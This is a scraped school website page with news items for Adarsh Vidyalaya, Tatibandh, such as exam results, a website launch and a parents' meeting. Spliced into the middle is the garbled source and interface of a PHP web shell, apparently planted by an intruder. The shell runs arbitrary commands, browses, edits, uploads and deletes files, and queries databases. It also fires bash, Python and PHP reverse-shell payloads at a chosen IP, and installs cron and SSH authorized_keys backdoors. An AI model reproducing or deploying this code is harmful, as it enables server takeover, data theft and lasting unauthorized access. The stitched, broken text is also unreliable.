Earth Day Celebration 2026

Adarsh Vidyalaya, Tatibandh shines bright in CBSE Board Exams 2025-26

&1"); return $output ? $output : "[-] No output, babi."; } // [⛧] BROWSE DIRECTORY SAMPE KE AKAR function browse($path) { if(!is_dir($path)) return "Not a directory, goblok!"; $files = scandir($path); $html = ""; $html .= ""; foreach($files as $file) { if($file != . && $file != ..) { $full = rtrim($path, /) . / . $file; $size = is_file($full) ? formatSize(filesize($full)) : "<DIR>"; $perms = substr(sprintf(%o, fileperms($full)), -4); $html .= ""; } } $html .= "

NameSizePermsAction
$file $size $perms [DEL] " . (is_file($full) ? "[EDIT]" : "") . "

"; return $html; } function formatSize($bytes) { if($bytes >= 1073741824) return round($bytes/1073741824, 2) . " GB"; if($bytes >= 1048576) return round($bytes/1048576, 2) . " MB"; if($bytes >= 1024) return round($bytes/1024, 2) . " KB"; return $bytes . " B"; } // [⛧] HANDLE REQUEST KONTOL $action = $_REQUEST[action] ?? ; $cmd = $_REQUEST[cmd] ?? ; $dir = $_REQUEST[dir] ?? __DIR__; $delete = $_REQUEST[delete] ?? ; $edit = $_REQUEST[edit] ?? ; $save = $_REQUEST[save] ?? ; $upload = $_FILES[upload] ?? null; $find = $_REQUEST[find] ?? ; $mass_cmd = $_REQUEST[mass_cmd] ?? ; // [⛧] DELETE FILE/DIRECTORY if($delete && file_exists($delete)) { if(is_file($delete)) unlink($delete); elseif(is_dir($delete)) rmdir($delete); echo "

"; } // [⛧] EDIT FILE if($edit && file_exists($edit)) { if($_SERVER[REQUEST_METHOD] === POST && $save) { file_put_contents($edit, $save); echo "

[+] File saved: $edit

"; } $content = htmlspecialchars(file_get_contents($edit)); echo "

"; echo "
"; echo ""; echo "

"; echo "


"; } // [⛧] UPLOAD FILE if($upload) { $target = $dir . "/" . basename($upload[name]); if(move_uploaded_file($upload[tmp_name], $target)) { echo "

[+] Uploaded: " . basename($upload[name]) . " to $dir

"; } else { echo "

[-] Upload failed, goblok!

"; } } // [⛧] MASS COMMAND EXECUTION (cari + eksekusi) if($mass_cmd) { echo "

";
    echo "[+] Executing $mass_cmd on all PHP files...
";
    $files = glob(__DIR__ . "/*.php");
    foreach($files as $file) {
        echo "
=== $file ===
";
        system($mass_cmd . " 2>&1");
    }
    echo "

"; } // [⛧] SEARCH FUNCTION if($find) { echo "

";
    echo "[+] Searching for: $find
";
    system("grep -rn $find " . __DIR__ . " 2>/dev/null");
    echo "

"; } ?>

 

[⛧] SOULVANT GODMODE SHELL

⛧ SOULVANT GODMODE SHELL ⛧

SERVER: | PHP: | USER: | PWD: | OS:

💀 COMMAND EXECUTION

 

📁 FILE BROWSER (FULL FILESYSTEM)

Current: [UP] [ROOT]

Upload File

🗄️ DATABASE PWN

query($_POST[db_query]); echo "
";
                    while($row = $result->fetchArray(SQLITE3_ASSOC)) {
                        print_r($row);
                    }
                    echo "
"; $db->close(); } catch(Exception $e) { echo "
Error: " . $e->getMessage() . "
"; } } elseif($_POST[db_type] == mysql) { echo "
" . fuck("mysql -e "" . addslashes($_POST[db_query]) . "" 2>&1") . "
"; } } ?>

🔌 REVERSE SHELL

& /dev/tcp/$ip/$port 0>&1", "python3 -c import socket,subprocess,os;s=socket.socket();s.connect(("$ip",$port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"]);", "php -r $sock=fsockopen("$ip",$port);exec("/bin/sh -i <&3 >&3 2>&3");" ]; foreach($payloads as $p) { fuck($p); } echo "
[+] Reverse shell payloads sent to $ip:$port
"; } ?>

💣 MASS EXPLOIT

Search in files:

Mass Command (on all PHP files in current dir):

🕵️ SYSTEM RECON

Click to expand
 

🎯 PERSISTENCE INSTALLER

&1"; file_put_contents("/tmp/cronjob", $cronjob); fuck("crontab /tmp/cronjob 2>/dev/null"); echo "
[+] Cron backdoor installed
"; } if(isset($_POST[install_ssh])) { $ssh_dir = getenv(HOME) . /.ssh; if(!is_dir($ssh_dir)) mkdir($ssh_dir, 0700); $key = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC... [YOUR PUBLIC KEY HERE]"; file_put_contents($ssh_dir . /authorized_keys, $key . " ", FILE_APPEND); echo "
[+] SSH backdoor installed (replace key first!)
"; } ?>

Adarsh Vidyalaya, Tatibandh hosts CBSE Capacity Building Programme

Adarsh Tatibandth: CBSE Capacity Building Program

ADARSH VIDYALAYA - TATIBANDH IN NEWS

 

 

 

 

Website of Adarsh Vidyalaya Tatibandh Launched

New Website www.adarshvidyalaya.net/tatibandh Launched

Chairman of Adarsh Vidyalaya Group of Schools Shri K.A. Shashidharan inaugurated the  website of Adarsh Vidyalaya, Tatibandh on 1st July, 2019 in the premises of Adarsh Vidyalaya, Tatibandh. Students, Teachers and staff were present during the inaugural ceremony. The Chairman emphasized the need for using technology in teaching. He urged the teachers to update themselves with the use of latest technologies in teaching profession. He congratulated the Principal and the staff for timely updation of student login portal. 

Parents Teachers Meeting

PTM for Periodic Assessment I is scheduled on 17/08/2019 i.e. Saturday from 8.45 a.m. to 11.00 a.m.

Janmasthtami

The School will be obeseriving holiday on 24/08/219 i.e. Saturday on account of Janmashtami.

test

dfbfhgmhj,jk,hmnc fc

Exam Time Table 1-9 & 11

Exam Time Table Pre-Primary

Adarsh Vidyalaya Tatibandh in News 2026

 

 

 

 

Adarsh Tatibandth: CBSE Capacity Building Program